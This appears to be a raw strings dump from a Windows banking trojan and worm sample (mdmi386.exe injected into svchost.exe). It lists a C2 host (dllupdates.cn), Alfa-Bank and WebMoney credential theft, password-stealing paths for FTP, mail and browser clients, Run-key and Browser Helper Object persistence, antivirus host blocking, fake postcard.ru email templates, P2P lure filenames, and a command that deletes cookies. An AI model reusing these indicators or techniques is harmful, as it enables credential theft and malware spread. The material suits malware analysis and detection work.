core.dll
core.dll
KWindows
KWindows
Porti
Porti
.ex)N
.ex)N
.MS'fc
.MS'fc
"#$%&'()
"#$%&'()
dD.Gz
dD.Gz
P|.Zc
P|.Zc
.Cu`k&
.Cu`k&
.nEZK
.nEZK
adv0pi32x.ql
adv0pi32x.ql
mdmi386.exe_1064_rwx_003B1000_0000C000:
h.dllhel32hkernT
h.dllhel32hkernT
.XV^x
.XV^x
.rsrc
.rsrc
.\kernel32.dll
.\kernel32.dll
@%.lI
@%.lI
,ey.yYeX
,ey.yYeX
auth_loginByP
auth_loginByP
[.kyALFAIBSR/b
[.kyALFAIBSR/b
!!PASSC"T
!!PASSC"T
2z?URL:
2z?URL:
7A5417FF-2D82-553C-F326
7A5417FF-2D82-553C-F326
/show.php HTTP/1.0
/show.php HTTP/1.0
%xt/0R, im}
%xt/0R, im}
-url%c[
-url%c[
.bm a
.bm a
.DirE
.DirE
.tB"d
.tB"d
SPV%Dl
SPV%Dl
=.Ru!
=.Ru!
1s.Hf] *
1s.Hf] *
Cert
Cert
TALCMD\\
TALCMD\\
OPERA
OPERA
d.lThi
d.lThi
-me}@l
-me}@l
a.cfI
a.cfI
KP.SJ
KP.SJ
y.kpug5
y.kpug5
.bpbk
.bpbk
.FGDV
.FGDV
KERNEL32.DLL
KERNEL32.DLL
advapi32.dll
advapi32.dll
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
oleaut32.dll
oleaut32.dll
RASAPI32.dll
RASAPI32.dll
SHLWAPI.DLL
SHLWAPI.DLL
user32.dll
user32.dll
wininet.dll
wininet.dll
wsock32.dll
wsock32.dll
RegOpenKeyA
RegOpenKeyA
core.dll
core.dll
mdmi386.exe_1064_rwx_00401000_00012000:
h.dllhel32hkernT
h.dllhel32hkernT
.data
.data
.code
.code
Porti
Porti
.ex)N
.ex)N
.MS'fc
.MS'fc
"#$%&'()
"#$%&'()
dD.Gz
dD.Gz
P|.Zc
P|.Zc
.Cu`k&
.Cu`k&
.nEZK
.nEZK
adv0pi32x.ql
adv0pi32x.ql
kernel32.dll
kernel32.dll
mdmi386.exe_1064_rwx_00B30000_00028000:
`.rsrc
`.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
update.symantec
update.symantec
liveupdate.symantecliveupdate
liveupdate.symantecliveupdate
secure.nai
secure.nai
sandbox.norman
sandbox.norman
uk.trendmicro-europe
uk.trendmicro-europe
money.yandex.ru/prepaid-ns.xml
money.yandex.ru/prepaid-ns.xml
command=auth_loginByPassword
command=auth_loginByPassword
https://click.alfabank.ru/ALFAIBSR/ControllerServlet
https://click.alfabank.ru/ALFAIBSR/ControllerServlet
command=auth_loginByPasswordPage
command=auth_loginByPasswordPage
PASS:
PASS:
CERT:
CERT:
ftp://
ftp://
http://
http://
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
POST /show.php HTTP/1.0
POST /show.php HTTP/1.0
User-Agent: Mozilla/4.4 (compatible; MSIE 6.0; Windows NT 5.1)
User-Agent: Mozilla/4.4 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.dllupdates.cn:
Host: www.dllupdates.cn:
Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
www.dllupdates.cn
www.dllupdates.cn
/index.html
/index.html
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
:.txf
:.txf
:..tqR
:..tqR
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
.bmp::
.bmp::
ole32.dll
ole32.dll
AUHook.dll
AUHook.dll
{BCBCD383-3E06-11D3-91A9-00C04F68105C}
{BCBCD383-3E06-11D3-91A9-00C04F68105C}
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\AUHook
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\AUHook
{A4C110AE-0291-F12A-2920-F0E455440770}
{A4C110AE-0291-F12A-2920-F0E455440770}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
Software\Microsoft\Windows\CurrentVersion\Run\Machine Debug Manager
Software\Microsoft\Windows\CurrentVersion\Run\Machine Debug Manager
mdmi386.exe
mdmi386.exe
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{77770022-0D68-4D14-BF25-6747ACFA95DE}
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{77770022-0D68-4D14-BF25-6747ACFA95DE}
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\ThreadingModel
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\ThreadingModel
{77770022-0D68-4D14-BF25-6747ACFA95DE}
{77770022-0D68-4D14-BF25-6747ACFA95DE}
.164.KWM::
.164.KWM::
crypt32.dll
crypt32.dll
CertOpenSystemStoreA
CertOpenSystemStoreA
CertCloseStore
CertCloseStore
PFXExportCertStore
PFXExportCertStore
WEBMONEY.EXE
WEBMONEY.EXE
TOTALCMD.EXE
TOTALCMD.EXE
ntdll.dll
ntdll.dll
IEXPLORE.EXE
IEXPLORE.EXE
OPERA.EXE
OPERA.EXE
HttpSendRequestA
HttpSendRequestA
wininet.dll
wininet.dll
EXPLORER.EXE
EXPLORER.EXE
7A5417FF-2D82-553C-F326-2861000FFFF3-01
7A5417FF-2D82-553C-F326-2861000FFFF3-01
dxdiagn.dat
dxdiagn.dat
7A5417FF-2D82-553C-F326-2861000FFFF3
7A5417FF-2D82-553C-F326-2861000FFFF3
More information: http://www.ibsensoftware.com/
More information: http://www.ibsensoftware.com/
217.5.97.137
217.5.97.137
reg_key
reg_key
\loader_name.exe
\loader_name.exe
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
.text
.text
.reloc
.reloc
\cplstub.exe
\cplstub.exe
user32.dll
user32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HELO %s.net
HELO %s.net
HELO %s.com
HELO %s.com
HELO %s.org
HELO %s.org
MAIL FROM:<%s>
MAIL FROM:<%s>
RCPT TO:<%s>
RCPT TO:<%s>
monica@postcard.ru
monica@postcard.ru
gold-certs@
gold-certs@
certific
certific
.subscribe
.subscribe
certs@
certs@
subscribe.ru
subscribe.ru
.xml@
.xml@
.gif@
.gif@
.png@
.png@
.jpg@
.jpg@
.mso@
.mso@
.bezotveta@
.bezotveta@
.shtm
.shtm
.dhtm
.dhtm
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Porno Screensaver.scr
Serials.txt.exe
Serials.txt.exe
KAV 6.0.exe
KAV 6.0.exe
Kaspersky Antivirus 6.0.exe
Kaspersky Antivirus 6.0.exe
Porno pics arhive, xxx.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Windown Longhorn Beta Leak.exe
Opera 9 New!.exe
Opera 9 New!.exe
XXX hardcore images.exe
XXX hardcore images.exe
WinAmp 7 New!.exe
WinAmp 7 New!.exe
WinAmp 7 Pro Keygen Crack Update.exe
WinAmp 7 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
ACDSee 9.exe
Date: %s
Date: %s
To: "%s" <%s>
To: "%s" <%s>
From: postcard service <monica></monica>
From: postcard service <monica></monica>
POSTCARD.RU
POSTCARD.RU
Comments: The best postcards in web, http://www.postcard.ru
Comments: The best postcards in web, http://www.postcard.ru
Message-ID: <%s%s>
Message-ID: <%s%s>
boundary="----=_POSTCARD.RU_%s"
boundary="----=_POSTCARD.RU_%s"
------=_POSTCARD.RU_%s
------=_POSTCARD.RU_%s
Content-Type: text/html; charset="windows-1251"
Content-Type: text/html; charset="windows-1251"
------=_POSTCARD.RU_%s--
------=_POSTCARD.RU_%s--
<img src="cid:%s.%s" /><br />
<img src="cid:%s.%s" /><br />
Password: %s
Password: %s
Pass - %s
Pass - %s
Password - %s
Password - %s
Re: Msg reply
Re: Msg reply
.ptdm { background:#707075; }
.ptdm { background:#707075; }
.ptdc { background:#90909A; }
.ptdc { background:#90909A; }
.plnm { color:#FFFFFF; font-size:10px; font-weight:bold; font-family:Verdana,Tahoma,Arial,Sans-Serif; text-decoration:none; }
.plnm { color:#FFFFFF; font-size:10px; font-weight:bold; font-family:Verdana,Tahoma,Arial,Sans-Serif; text-decoration:none; }
<a href="http://www.postcard.ru/get/?1%s" target="_blank"><table><tr><td><a href="http://%s?1%s">http://www.postcard.ru/get/?1%s</a></td></tr></table></a>
<a href="http://www.postcard.ru/get/?1%s" target="_blank"><table><tr><td><a href="http://%s?1%s">http://www.postcard.ru/get/?1%s</a></td></tr></table></a>
<a href="http://www.postcard.ru/" target="_blank">http://www.postcard.ru/</a><br />
<a href="http://www.postcard.ru/" target="_blank">http://www.postcard.ru/</a><br />
monica@postcard.ru<br />
monica@postcard.ru<br />
www.aerosib.ru/
www.aerosib.ru/
www.avinyon.com/
www.avinyon.com/
www.basdesign.ru/
www.basdesign.ru/
www.fivestar.spb.ru/www/index.shtml
www.fivestar.spb.ru/www/index.shtml
www.siticom.ru/index.htm
www.siticom.ru/index.htm
www.myamoi.ru/index.html
www.myamoi.ru/index.html
www.firebook.ru/index.html
www.firebook.ru/index.html
www.polistroy.kaluga.ru/
www.polistroy.kaluga.ru/
www.racus.ru/index.html
www.racus.ru/index.html
www.mir-polov.ru/index.html
www.mir-polov.ru/index.html
www.mobyline.info/index.html
www.mobyline.info/index.html
www.imaksi.h15.ru/index.html
www.imaksi.h15.ru/index.html
advapi32.dll
advapi32.dll
iphlpapi.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
C:\out.bin
C:\out.bin
PMODkernel32.dll
PMODkernel32.dll
|shfolder.dll
|shfolder.dll
psapi.dll
psapi.dll
\account.cfg
\account.cfg
\account.cfn
\account.cfn
\*.dat
\*.dat
%s Database
%s Database
Password
Password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&RQ
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&RQ
\&RQ.exe
\&RQ.exe
crypted-password
crypted-password
\andrq.ini
\andrq.ini
\Microsoft\Network\Connections\pbk\rasphone.pbk
\Microsoft\Network\Connections\pbk\rasphone.pbk
RasDialParams!%s#0
RasDialParams!%s#0
SOFTWARE\Far\Plugins\FTP\Hosts
SOFTWARE\Far\Plugins\FTP\Hosts
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian\
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian\
\aim.ini
\aim.ini
\users\global\profiles.ini
\users\global\profiles.ini
Software\Ghisler\Windows Commander
Software\Ghisler\Windows Commander
FtpIniName
FtpIniName
\wcx_ftp.ini
\wcx_ftp.ini
password
password
INETCOMM Server Passwords
INETCOMM Server Passwords
Outlook Account Manager Passwords
Outlook Account Manager Passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\%s\%s
%s\%s\%s
%s\%s
%s\%s
SMTP Email Address
SMTP Email Address
POP3 Password
POP3 Password
POP3 Password2
POP3 Password2
IMAP Password
IMAP Password
IMAP Password2
IMAP Password2
pstorec.dll
pstorec.dll
\Mailbox.ini
\Mailbox.ini
PassWd
PassWd
\GlobalSCAPE\CuteFTP\
\GlobalSCAPE\CuteFTP\
\GlobalSCAPE\CuteFTP Pro\
\GlobalSCAPE\CuteFTP Pro\
\cutftp32.exe
\cutftp32.exe
%Program Files%\CuteFTP\
%Program Files%\CuteFTP\
sm.dat
sm.dat
tree.dat
tree.dat
smdata.dat
smdata.dat
PasswordSaved
PasswordSaved
LoginSaved
LoginSaved
\edialer.ini
\edialer.ini
WS_FTP
WS_FTP
\*.ini
\*.ini
\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP Home\Sites
\Ipswitch\WS_FTP Home\Sites
\win.ini
\win.ini
\ws_ftp.ini
\ws_ftp.ini
\ws_ftp.exe
\ws_ftp.exe
\Opera
\Opera
\Mail\accounts.ini
\Mail\accounts.ini
\profile\wand.dat
\profile\wand.dat
Software\Opera Software
Software\Opera Software
Incoming Password
Incoming Password
\Mozilla\Profiles
\Mozilla\Profiles
%Documents and Settings%\%current user%\Application Data\The Bat!\*.*
%Documents and Settings%\%current user%\Application Data\The Bat!\*.*
d:\Procmon.exe
d:\Procmon.exe
ec.exe
ec.exe
32.exe
32.exe
ore.exe
ore.exe
D.EXE",-208
D.EXE",-208
.dll,-20003
.dll,-20003
%Documents and Settings%\%current user%\Trillian\User Settings\
%Documents and Settings%\%current user%\Trillian\User Settings\
%APPDATA%\GHISLER\wcx_ftp.ini
%APPDATA%\GHISLER\wcx_ftp.ini
Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\Software\Microsoft\Internet Account Manager\Accounts
Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\Software\Microsoft\Internet Account Manager\Accounts
Pro\6.0\sm.dat
Pro\6.0\sm.dat
%WinDir%\edialer.ini
%WinDir%\edialer.ini
e\Sites\*.ini
e\Sites\*.ini
%WinDir%\win.ini
%WinDir%\win.ini
%Documents and Settings%\%current user%\Application Data\Opera\*.*\Mail\accounts.ini
%Documents and Settings%\%current user%\Application Data\Opera\*.*\Mail\accounts.ini
%Documents and Settings%\%current user%\Application Data\Mozilla\Profiles\*.*
%Documents and Settings%\%current user%\Application Data\Mozilla\Profiles\*.*
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
GetKeyboardType
GetKeyboardType
.idata
.idata
.edata
.edata
P.reloc
P.reloc
P.rsrc
P.rsrc
.bpbk
.bpbk
.FGDV
.FGDV
KERNEL32.DLL
KERNEL32.DLL
gdi32.dll
gdi32.dll
oleaut32.dll
oleaut32.dll
RASAPI32.dll
RASAPI32.dll
SHLWAPI.DLL
SHLWAPI.DLL
wsock32.dll
wsock32.dll
core.dll
core.dll
export
export
66006666
66006666
iER\wcx_ftp.ini
iER\wcx_ftp.ini
mdmi386.exe_1064_rwx_13140000_00038000:
.data
.data
.code
.code
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
update.symantec
update.symantec
liveupdate.symantecliveupdate
liveupdate.symantecliveupdate
secure.nai
secure.nai
sandbox.norman
sandbox.norman
uk.trendmicro-europe
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 403
HTTP/1.1 404
HTTP/1.1 404
wsock32.dll
wsock32.dll
svchost.exe
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
mdmi386.exe
AUHook.dll
AUHook.dll
AUHook.dat
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.text
.idata
.idata
.edata
.edata
.XV^x
.XV^x
.b.Im
.b.Im
advapi32.dll
advapi32.dll
RegOpenKeyA
RegOpenKeyA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
oleaut32.dll
oleaut32.dll
RASAPI32.dll
RASAPI32.dll
SHLWAPI.DLL
SHLWAPI.DLL
user32.dll
user32.dll
wininet.dll
wininet.dll
core.dll
core.dll
KWindows
KWindows
Porti
Porti
.ex)N
.ex)N
.MS'fc
.MS'fc
"#$%&'()
"#$%&'()
dD.Gz
dD.Gz
P|.Zc
P|.Zc
.Cu`k&
.Cu`k&
.nEZK
.nEZK
adv0pi32x.ql
adv0pi32x.ql
svchost.exe_1588:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_1588_rwx_13140000_00038000:
.data
.data
.code
.code
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
update.symantec
update.symantec
liveupdate.symantecliveupdate
liveupdate.symantecliveupdate
secure.nai
secure.nai
sandbox.norman
sandbox.norman
uk.trendmicro-europe
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 403
HTTP/1.1 404
HTTP/1.1 404
wsock32.dll
wsock32.dll
svchost.exe
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
mdmi386.exe
AUHook.dll
AUHook.dll
AUHook.dat
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.text
.idata
.idata
.edata
.edata
.XV^x
.XV^x
.b.Im
.b.Im
advapi32.dll
advapi32.dll
RegOpenKeyA
RegOpenKeyA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
oleaut32.dll
oleaut32.dll
RASAPI32.dll
RASAPI32.dll
SHLWAPI.DLL
SHLWAPI.DLL
user32.dll
user32.dll
wininet.dll
wininet.dll
core.dll
core.dll
KWindows
KWindows
Porti
Porti
.ex)N
.ex)N
.MS'fc
.MS'fc
"#$%&'()
"#$%&'()
dD.Gz
dD.Gz
P|.Zc
P|.Zc
.Cu`k&
.Cu`k&
.nEZK
.nEZK
adv0pi32x.ql
adv0pi32x.ql